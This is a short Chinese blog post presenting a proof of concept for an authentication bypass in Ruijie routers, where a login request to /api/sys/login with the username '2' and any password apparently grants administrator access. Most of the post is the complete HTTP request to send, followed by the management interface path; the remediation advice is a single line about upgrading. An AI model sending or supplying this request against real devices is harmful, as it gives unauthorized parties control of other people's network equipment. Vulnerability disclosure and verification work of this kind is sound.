login默认用户登录权限绕过漏洞

一、漏洞描述

锐捷路由器存在后门用户，输入任意用户名即可登陆成功。

二、POC

修改登录请求包中的username参数值为“2”，密码任意，然后放包

POST /api/sys/login HTTP/1.1
Host: XXXX
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; rv 11.0) like Gecko
Accept: */*
Accept-Encoding: gzip,deflate
Accept-Language: zh-cn,en-us;q=0.7,en;q=0.3
Content-Type: application/json;charset=UTF-8
Content-Length: 68

{"password":"abcdefgeeee3","timestamp":1691420513000,"username":"2"}

管理界面访问路径为：http://XXXX/#/overview

三、验证截图

四、修复建议

联系官方升级至最新版本

posted @ 2025-05-19 15:19 Domren 阅读(167) 评论(0) 收藏举报

刷新页面返回顶部

漏洞验证-锐捷/api/sys/login默认用户登录权限绕过漏洞

公告